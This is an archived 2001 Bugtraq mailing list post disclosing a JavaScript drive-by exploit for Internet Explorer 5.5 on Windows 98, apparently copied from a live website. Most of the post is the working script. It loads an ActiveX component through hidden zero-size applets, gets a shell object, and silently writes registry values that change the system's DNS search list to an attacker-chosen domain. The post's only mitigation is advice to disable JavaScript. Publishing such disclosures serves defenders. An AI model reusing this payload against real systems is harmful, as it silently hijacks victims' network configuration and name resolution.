Bugtraq mailing list archives

javascript can write anything to windows98 registry

From: "Marcin Jackowski" <marcin () jackowski net>
Date: Tue, 28 Aug 2001 10:21:10 +0200

here's code from
www.4y4y.net:88/ls.html
it can write any value to windows98 registry

solution: disable JavaScript in InternetExplorer

tested on IE5.5


Marcin Jackowski

---------------------------------------------------------------

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
    try{
        a1=document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();Shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se
rvers.net");
        }
        catch(e){}
    }
    catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
    try{
        a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
            try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
            }
        catch(e){}
    }
    catch(e){}
}setTimeout("yuzi2()",1000);
</script>

Attachment: smime.p7s
Description:

Current thread:

javascript can write anything to windows98 registry Marcin Jackowski (Aug 28)
- <Possible follow-ups>
- RE: javascript can write anything to windows98 registry Rob Lemos (Aug 29)